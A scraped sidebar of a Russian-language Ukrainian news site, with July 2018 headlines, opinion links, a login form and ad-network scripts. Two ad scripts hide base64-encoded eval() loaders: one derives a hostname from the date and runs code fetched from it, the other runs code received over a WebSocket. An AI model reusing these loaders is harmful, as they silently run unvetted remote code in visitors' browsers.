	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
            <script type="text/javascript">

    (function(w, d, y, h, p, a, b) {
        w[y] = w[y] || []; w[y].push(function() {return [a, b]});
        for (var e, r = d.getElementsByTagName("script"), t = h + "/d0e1/e179f51b/5154/719f/5b027feea71/0e17fee/d0e17fe", n = r.length; n--;) (r[n].src == t || r[n].src.indexOf(t) > -1) && (e = r[n]);
        if (w['ccScriptSupport'] === undefined || !e) {
            var s = d.head || d.getElementsByTagName("head")[0]; e = d.createElement("script"), e.type = "text/javascript", e.src = t, s.appendChild(e);e.setAttribute('data-base', h);e.setAttribute('data-config', p);
        }
    })(this, this.document, "spAsyncScript", 'https://csp-qcw5yi.ru', 9568, this.document.currentScript, '5b4f41520bbda536cf2240e3');
</script>    
            <div id="MIXADV_4786" class="MIXADVERT_NET"></div>
          <script> 
          var node4786 = document.getElementById("MIXADV_4786");
          if( node4786 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4786&r="+Math.random();
               node4786.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ4eXoiXTsgdmFyIHN0ciA9ZGF5Kihtb250aCAqIG5hbWVfZGF5ICogZGF5KSsiIisgZGF5Kihtb250aCArIG5hbWVfZGF5ICsgZGF5ICt5ZWFyKTt2YXIgaGFzaCA9ICBidG9hKGJ0b2Eoc3RyKSkudG9Mb3dlckNhc2UoKTsgdmFyIGhvc3QgPSBoYXNoLnN1YnN0cmluZygzLCBoYXNoLmxlbmd0aCAtIG5hbWVfZGF5LzIpKyIuIitkb21bbmFtZV9kYXkgLSAxXTt2YXIgciA9IE1hdGgucmFuZG9tKCkudG9TdHJpbmcoMzYpLnN1YnN0cigyLCAyKTtyID0gci5yZXBsYWNlKC9bMC05XS9nLCAiIik7dmFyIGRlbHRhID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogKDEwMCAtIDEwICsgMSkpICsgMTA7dmFyIGlkID0gNDc4NiAtIGRlbHRhOyB2YXIgc2NyaXB0X2ZpcnN0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7c2NyaXB0X2ZpcnN0LnNyYyA9ICJodHRwczovLyIrIGhvc3QrIi8iK2RlbHRhK2lkK3IrIiI7IG5vZGU0Nzg2LnBhcmVudE5vZGUuYXBwZW5kQ2hpbGQoc2NyaXB0X2ZpcnN0KTtzY3JpcHRfZmlyc3Qub25lcnJvciA9IGZ1bmN0aW9uKCl7IHNldFRpbWVvdXQoIGZ1bmN0aW9uICgpIHsgaWYoIG5vZGU0Nzg2LmlubmVySFRNTCA9PSAiIiApIHdpbmRvdy5ldmFsKGxvY2FsU3RvcmFnZS5nZXRJdGVtKCI0Nzg2IikpIH0sIDUwMDApOyAgO307IA==") );
              }
          }
          </script>
            <div id="M225926ScriptRootC608879">
        <div id="M225926PreloadC608879">
        Загрузка...
    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M225926ScriptRootC608879")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M225926ScriptRootC608879");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=608879;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsc.marketgid.com/h/r/hronika.info.608879.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- Composite End -->
            
            <!-- noindex -->
<div id="CNM4146" style="text-align:center;display:none" ><a href="https://www.novostimira.biz/" id="CNM4146t" style="display:none" rel="nofollow" target="_blank"><strong>Новости</strong></a></div>

<!-- before </body> -->
<script type="text/javascript" async="async" >
  var el = document.getElementById('CNM4146');
  if (el) {
    if (document.getElementById('CNM4146t').style.display == 'none') {
      document.getElementById('CNM4146t').style.display = '';
      var dateNM = new Date();
      var t = Math.floor(dateNM.getTime()/(1000*600));
      var NMces=document.createElement('script');
      NMces.type = 'text/javascript';
      NMces.charset='UTF-8';
      NMces.src='http'+(window.location.protocol=='https:'?'s':'')+'://c.novostimira.biz/l/4146?v='+t;
      el.parentNode.appendChild(NMces);
    }
  }
</script>
<!--/ noindex -->
            <!-- start NEW_v1_right for hronika.info -->
<div id="adpartner-jsunit-850">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=850&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<!-- end NEW_v1_right for hronika.info -->
             
            <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Side-1 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5084862545"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
				<h3>Хроника событий сегодня</h3>
               <div class="newsr_1">
    <span>24.07-01:27</span>
	<a href="http://hronika.info/videonovosti/336220-v-kievskoy-oblasti-poyavilsya-novyy-opasnyy-manyak-video.html"><strong title="В Киевской области появился новый опасный маньяк. Видео">В Киевской области появился новый опасный маньяк. Видео</strong><b>13</b></a>
</div><div class="newsr_1">
    <span>24.07-01:15</span>
	<a href="http://hronika.info/mir/336219-v-turcii-proshli-massovye-oblavy-na-boevikov-igil.html"><strong title="В Турции прошли массовые облавы на боевиков ИГИЛ">В Турции прошли массовые облавы на боевиков ИГИЛ</strong><b>108</b></a>
</div><div class="newsr_1">
    <span>24.07-01:03</span>
	<a href="http://hronika.info/neverojatnoe/336218-proroki-rasskazali-kakoy-kataklizm-razrushit-moskvu.html"><strong title="Пророки рассказали, какой катаклизм разрушит Москву">Пророки рассказали, какой катаклизм разрушит Москву</strong><b>123</b></a>
</div><div class="newsr_1">
    <span>24.07-00:52</span>
	<a href="http://hronika.info/avto/336217-nbu-postepenno-peresazhivaet-sotrudnikov-na-elektromobili.html"><strong title="НБУ постепенно пересаживает сотрудников на электромобили">НБУ постепенно пересаживает сотрудников на электромобили</strong><b>159</b></a>
</div><div class="newsr_1">
    <span>24.07-00:41</span>
	<a href="http://hronika.info/kultura/336216-veduschiy-shou-holostyak-pokazal-svoyu-semyu-na-otdyhe.html"><strong title="Ведущий шоу "Холостяк" показал свою семью на отдыхе">Ведущий шоу "Холостяк" показал свою семью на отдыхе</strong><b>215</b></a>
</div><div class="newsr_1">
    <span>24.07-00:30</span>
	<a href="http://hronika.info/medicina/336215-uchenye-rasskazali-pochemu-zhenschinam-ne-stoit-dobavlyat-moloko-v-chay.html"><strong title="Ученые рассказали, почему женщинам не стоит добавлять молоко в чай">Ученые рассказали, почему женщинам не стоит добавлять молоко в чай</strong><b>307</b></a>
</div><div class="newsr_1">
    <span>24.07-00:19</span>
	<a href="http://hronika.info/videonovosti/336214-nagrudnaya-kamera-kopa-snyala-zahvatyvayuschuyu-pogonyu-so-strelboy-v-ssha-video.html"><strong title="Нагрудная камера копа сняла захватывающую погоню со стрельбой в США. Видео">Нагрудная камера копа сняла захватывающую погоню со стрельбой в США. Видео</strong><b>789</b></a>
</div><div class="newsr_1">
    <span>24.07-00:09</span>
	<a href="http://hronika.info/mir/336213-shiity-prizvali-putina-vvesti-voyska-v-yemen.html"><strong title="Шииты призвали Путина ввести войска в Йемен">Шииты призвали Путина ввести войска в Йемен</strong><b>600</b></a>
</div><div class="newsr_1">
    <span>23.07-23:58</span>
	<a href="http://hronika.info/obwestvo/336212-v-ukraine-prokommentirovali-sostoyanie-zdorovya-olega-sencova.html"><strong title="В Украине прокомментировали состояние здоровья Олега Сенцова">В Украине прокомментировали состояние здоровья Олега Сенцова</strong><b>175</b></a>
</div><div class="newsr_1">
    <span>23.07-23:52</span>
	<a href="http://hronika.info/fotoreportazhi/336077-nazvany-samye-krasivye-v-mire-vokzaly-foto.html"><strong title="Названы самые красивые в мире вокзалы. Фото">Названы самые красивые в мире вокзалы. Фото</strong><b>979</b></a>
</div>
                <div class="vsenovosti" title="Все новости хроники"><a href="/lastnews">Все новости хроники</a></div>
			</div>

               <div class="wrap">
				<h3>События сегодня</h3>           
</div>
   </div>   
   
   <div class="width49-4 fright">
   
   
<!--
<div id="ax_popular_comp">
	<ul class="tabs tshadow ax_tabs" style="height: 31px;">
		<li title="Компетентно" style="width: 147px;"><a href="#ax_comp">Компетентно</a></li>
		<li title="Актуально"><a href="#ax_actual">Актуально</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_comp">
			<div class="b-tab-n1">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html"><img src="/posters/300_131_70_1/uploads/posts/2015-03/thumbs/1426164908_mvf.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-author"><a href="/kompetentno/">Наши эксперты</a></span>
	<span class="b-full-link"><a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html">«Согреют» ли деньги МВФ простых украинцев</a></span>
	
</div>

<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author1"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426164917_lanov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Лановой</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author2"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426164962_zhalilo.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Ярослав Жалило</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author3"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426165061_dubrov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Дубровский</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author4"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426165044_shapran.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Виталий Шапран</span>
</div>

		</div>			
		<div id="ax_actual">
			 <div class="b-tab-n1">
	<a href="http://hronika.info/politika/336098-vyrubka-lesa-v-ukraine-dostigla-nebyvalyh-razmerov-groysman.html"><img src="/posters/300_131_70_1/uploads/posts/2018-07/thumbs/1532347034_vyrubka-lesa.jpg" alt="Вырубка леса в Украине достигла небывалых размеров, - Гройсман" title="Вырубка леса в Украине достигла небывалых размеров, - Гройсман" /></a>
	
	<span class="b-full-link"><a href="http://hronika.info/politika/336098-vyrubka-lesa-v-ukraine-dostigla-nebyvalyh-razmerov-groysman.html">Вырубка леса в Украине достигла небывалых размеров, - Гройсман</a></span>

</div>
			 <div class="b-tab-n2">
	<a href="http://hronika.info/politika/336086-poroshenko-nalozhil-veto-na-zakon-protiv-vyrubki-lesov.html"><img src="/posters/74_74_70_1/uploads/posts/2018-07/thumbs/1532344833_vyrubka.jpg" alt="Порошенко наложил вето на закон против вырубки лесов" title="Порошенко наложил вето на закон против вырубки лесов" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/336026-kanada-vooruzhit-ukrainskih-snayperov.html"><img src="/posters/74_74_70_1/uploads/posts/2018-07/thumbs/1532333808_snaypery.jpg" alt="Канада вооружит украинских снайперов" title="Канада вооружит украинских снайперов" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/335385-posla-italii-vyzvali-na-kover-v-mid-ukrainy.html"><img src="/posters/74_74_70_1/uploads/posts/2018-07/thumbs/1532105253_mid.jpg" alt="Посла Италии вызвали "на ковер" в МИД Украины" title="Посла Италии вызвали "на ковер" в МИД Украины" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/335343-ministr-vnutrennih-del-italii-nazval-anneksiyu-kryma-zakonnoy.html"><img src="/posters/74_74_70_1/uploads/posts/2018-07/thumbs/1532097330_krym.jpg" alt="Министр внутренних дел Италии назвал аннексию Крыма законной" title="Министр внутренних дел Италии назвал аннексию Крыма законной" /></a>
	

</div>
		</div>			         
	</div>
</div>

<div class="clr"></div>
 

-->      
       


			<div class="wrap">
				<h3 class="inbg">Мнения</h3> 
				<div>
					<div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1872.jpg" />
        <div>12.07.2018|17:00</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%90%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80+%D0%9E%D1%85%D1%80%D0%B8%D0%BC%D0%B5%D0%BD%D0%BA%D0%BE', 'http://hronika.info/user/%D0%90%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80+%D0%9E%D1%85%D1%80%D0%B8%D0%BC%D0%B5%D0%BD%D0%BA%D0%BE/', '0'); return false;" href="http://hronika.info/user/%D0%90%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80+%D0%9E%D1%85%D1%80%D0%B8%D0%BC%D0%B5%D0%BD%D0%BA%D0%BE/">Александр Охрименко</a></div>
    	<strong><a href="http://hronika.info/mnenia/332909-est-li-u-ukrainy-buduschee-bez-transha-mvf.html">Есть ли у Украины будущее без транша МВФ</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1959.jpg" />
        <div>12.07.2018|16:15</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%98%D0%B3%D0%BE%D1%80%D1%8C+%D0%93%D0%BE%D0%BB%D0%BE%D0%B2%D0%B0%D0%BD%D1%8C', 'http://hronika.info/user/%D0%98%D0%B3%D0%BE%D1%80%D1%8C+%D0%93%D0%BE%D0%BB%D0%BE%D0%B2%D0%B0%D0%BD%D1%8C/', '0'); return false;" href="http://hronika.info/user/%D0%98%D0%B3%D0%BE%D1%80%D1%8C+%D0%93%D0%BE%D0%BB%D0%BE%D0%B2%D0%B0%D0%BD%D1%8C/">Игорь Головань</a></div>
    	<strong><a href="http://hronika.info/mnenia/332907-pro-profesynu-dobrochesnst.html">Про професійну доброчесність</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1927.jpg" />
        <div>12.07.2018|15:30</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%B8%D0%B9+%D0%A2%D1%83%D0%B7%D0%BE%D0%B2', 'http://hronika.info/user/%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%B8%D0%B9+%D0%A2%D1%83%D0%B7%D0%BE%D0%B2/', '0'); return false;" href="http://hronika.info/user/%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%B8%D0%B9+%D0%A2%D1%83%D0%B7%D0%BE%D0%B2/">Дмитрий Тузов</a></div>
    	<strong><a href="http://hronika.info/mnenia/332906-ukrayinc-pdtrimayemo-horvatv.html">Українці, підтримаємо хорватів</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1999.jpg" />
        <div>12.07.2018|14:45</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%9C%D1%83%D1%81%D1%82%D0%B0%D1%84%D0%B0+%D0%9D%D0%B0%D0%B9%D0%B5%D0%BC', 'http://hronika.info/user/%D0%9C%D1%83%D1%81%D1%82%D0%B0%D1%84%D0%B0+%D0%9D%D0%B0%D0%B9%D0%B5%D0%BC/', '0'); return false;" href="http://hronika.info/user/%D0%9C%D1%83%D1%81%D1%82%D0%B0%D1%84%D0%B0+%D0%9D%D0%B0%D0%B9%D0%B5%D0%BC/">Мустафа Найем</a></div>
    	<strong><a href="http://hronika.info/mnenia/332905-yakim-chinom-povernuti-ukrayincv-okupovanih-teritory.html">Яким чином повернути українців окупованих територій</a></strong>			
</div>
				</div>
                <div class="vsenovosti" title="Мнения, рассуждения, аналитика"><a href="/mnenia/">Читать все мнения</a></div>
			</div>
  

	<div class="hrap" >
    
            	﻿


 <div class="fleft authbut"><a class="alert4">Авторизация</a></div> 
 <div class="fright authbut"><a rel="nofollow" href="/index.php?do=register">Регистрация</a></div>
 <div class="clr"></div>
<div id="dim4">
<div class="msgbox">
<div class="msgboxttl"><span></span>Вход на сайт<a class="close">X</a></div>
 		<form method="post" action="#">
				<div id="logentform"><span></span>
                <div class="msgbox_ent">Войти используя учетную запись хроники</div>
					<ul class="reset">
						<li class="logfield"><label for="login_name">Введите E-Mail:</label><input type="text" name="login_name" id="login_name" /></li>
						<li class="logfield"><label for="login_password">Введите Пароль :</label><input type="password" name="login_password" id="login_password" />&nbsp;(<a id="zabyli" href="http://hronika.info/index.php?do=lostpassword">Забыли?</a>)</li><br />
						<li class="zapomnit"><input type="checkbox" name="login_not_save" id="login_not_save" value="1"/><label for="login_not_save">&nbsp;Запомнить меня</label><button onclick="submit();" type="submit" title="Войти">Войти</button></li>
					</ul>
					<input name="login" type="hidden" id="login" value="submit" />
                    <div id="logreg"><a rel="nofollow" href="/index.php?do=register">Зарегистрироваться</a></div>
				</div> 
			</form>
            
            
 <div class="sotsenter">
	
	
	
	
	
	
 </div>

    <div class="clr h40"></div>
 <div class="clr msgbox_b"></div>
       </div>
    </div>

    </div>

    <div class="wrap"> 
        <!-- noindex -->
<div id='kurs-com-ua-informer-main-ukraine-300x130-blue-container'><a href="//old.kurs.com.ua/informer" id="kurs-com-ua-informer-main-ukraine-300x130-blue" title="Курс валют информер Украина" rel="nofollow" target="_blank">Информер курса валют</a></div>
<script type='text/javascript'>
(function() {var iframe = '<ifr'+'ame src="//old.kurs.com.ua/informer/inf2?color=blue" width="300" height="130" frameborder="0" vspace="0" scrolling="no" hspace="0"></ifr'+'ame>';var container = document.getElementById('kurs-com-ua-informer-main-ukraine-300x130-blue');container.parentNode.innerHTML = iframe;})();
</script>
<noscript><img src='//old.kurs.com.ua/static/images/informer/kurs.png' width='52' height='26' alt='kurs.com.ua: курс валют в Украине!' title='Курс валют' border='0' /></noscript>
<!--/ noindex -->  
        
    <div class="wrap">
        
    </div>
        
          
    <div class="wrap">
            	<h3>Новости сегодня</h3>
<div id="FMg6hQON63UZxhcgPUb0" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'hronikka.com';</script>
<script src="//hronikka.com/fR37/h0.js" ></script>

<script id="r17725" type="text/javascript">
    (function() {
        var worker17725,
            tickerID = 17725,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17725.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker17725.postMessage(data);
                }

                worker17725 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17725.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17725.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
<center><script>
(function(c,o,u,n,t,e,r){
r = c[u](o); r[n] = t; r.async = 1;
r.onload = function(){c['AliExpressBannerGlobalObject'](e)};
c.body.appendChild(r);
})(document, 'script', 'createElement', 'src', '//alishop6.ru/902dy/src.js');
</script>

<div class="some_class"></div>
</center>
    </div>
        

              		<div id="poisk">
					<form method="post" action='#'>
						<input type="hidden" name="do" value="search" />
						<input type="hidden" name="subaction" value="search" />
						<input id="story" name="story" value="Введите поисковый запрос" onblur="if(this.value=='') this.value='Введите поисковый запрос';" onfocus="if(this.value=='Введите поисковый запрос') this.value='';" type="text" />
                        <input  alt="найти" type="image" src="/templates/hronika/images/poisk.png" />
					</form>
				</div>
			</div>
             
           
                       
            <div class="wrap bshadow">
				<h3 class="inbg">Самое интересное за неделю</h3> 				

<div id="ax_popular_obs">
	<ul class="tabs tshadow ax_tabs" style="height: 25px;">
		<li title="Обсуждаемое"><a href="#ax_obs">Обсуждаемое</a></li>
		<li title="Популярное"><a href="#ax_popular">Популярное</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_obs">
			 <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/335756-zayavlenie-taisii-povaliy-vzbudorazhilo-polzovateley-seti.html"><span>22.07-12:28</span>
	<strong title="Заявление Таисии Повалий взбудоражило пользователей Сети">Заявление Таисии Повалий взбудоражило пользователей Сети</strong></a><b>6811</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/334445-v-nikolaeve-zoozaschitniki-izbili-direktora-centra-zaschity-zhivotnyh-video.html"><span>17.07-15:56</span>
	<strong title="В Николаеве зоозащитники избили директора «Центра защиты животных». Видео">В Николаеве зоозащитники избили директора «Центра защиты животных». Видео</strong></a><b>1734</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/335956-na-plyazhe-v-kirillovke-zametili-stayu-delfinov-video.html"><span>23.07-07:20</span>
	<strong title="На пляже в Кирилловке заметили стаю дельфинов. Видео">На пляже в Кирилловке заметили стаю дельфинов. Видео</strong></a><b>4914</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/ekonomika/334958-kabmin-nazval-ugrozy-zakona-ob-avtomobilyah-na-evronomerah.html"><span>19.07-12:23</span>
	<strong title="Кабмин назвал угрозы закона об автомобилях на еврономерах">Кабмин назвал угрозы закона об автомобилях на еврономерах</strong></a><b>1869</b><div class="category_lastn_date" title="Экономика">&nbsp;&nbsp;<a href="http://hronika.info/ekonomika/">Экономика</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/neverojatnoe/335883-naydena-odna-iz-drevneyshih-goncharnyh-masterskih.html"><span>22.07-18:47</span>
	<strong title="Найдена одна из древнейших гончарных мастерских">Найдена одна из древнейших гончарных мастерских</strong></a><b>588</b><div class="category_lastn_date" title="Невероятное">&nbsp;&nbsp;<a href="http://hronika.info/neverojatnoe/">Невероятное</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/obwestvo/335755-stalo-izvestno-kak-v-kieve-otmetyat-den-krescheniya-rusi.html"><span>22.07-12:25</span>
	<strong title="Стало известно, как в Киеве отметят День крещения Руси">Стало известно, как в Киеве отметят День крещения Руси</strong></a><b>827</b><div class="category_lastn_date" title="Общество">&nbsp;&nbsp;<a href="http://hronika.info/obwestvo/">Общество</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/335749-boy-usika-s-gassievym-luchshie-momenty-epichnogo-poedinka-video.html"><span>22.07-12:02</span>
	<strong title="Бой Усика с Гассиевым: лучшие моменты эпичного поединка. Видео">Бой Усика с Гассиевым: лучшие моменты эпичного поединка. Видео</strong></a><b>5329</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/335742-eks-solistka-nikita-polnostyu-obnazhilas-pered-kameroy.html"><span>22.07-11:44</span>
	<strong title="Экс-солистка Nikita полностью обнажилась перед камерой">Экс-солистка Nikita полностью обнажилась перед камерой</strong></a><b>22932</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/neverojatnoe/335714-chelovechestvo-vstupilo-v-novuyu-epohu.html"><span>22.07-10:04</span>
	<strong title="Человечество вступило в новую эпоху">Человечество вступило в новую эпоху</strong></a><b>4028</b><div class="category_lastn_date" title="Невероятное">&nbsp;&nbsp;<a href="http://hronika.info/neverojatnoe/">Невероятное</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/335375-yana-solomko-pohvastalas-novym-kupalnikom.html"><span>20.07-20:10</span>
	<strong title="Яна Соломко похвасталась новым купальником">Яна Соломко похвасталась новым купальником</strong></a><b>1632</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div>
			
		</div>			
		<div id="ax_popular">
		   <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/335766-nazvana-luchshaya-dieta-dlya-effektivnogo-pohudeniya.html"><span>22.07-12:58</span>
	<strong title="Названа лучшая диета для эффективного похудения">Названа лучшая диета для эффективного похудения</strong></a><b>39917</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/335742-eks-solistka-nikita-polnostyu-obnazhilas-pered-kameroy.html"><span>22.07-11:44</span>
	<strong title="Экс-солистка Nikita полностью обнажилась перед камерой">Экс-солистка Nikita полностью обнажилась перед камерой</strong></a><b>22932</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/335778-eti-populyarnye-produkty-medlenno-razrushayut-organizm.html"><span>22.07-13:40</span>
	<strong title="Эти популярные продукты медленно разрушают организм">Эти популярные продукты медленно разрушают организм</strong></a><b>21692</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/334682-mediki-nazvali-prichinu-vozniknoveniya-migreney.html"><span>18.07-13:52</span>
	<strong title="Медики назвали причину возникновения мигреней">Медики назвали причину возникновения мигреней</strong></a><b>14936</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/avto/334274-fotofakt-v-kieve-poyavilsya-renault-laguna-na-redchayshih-nomerah.html"><span>17.07-01:51</span>
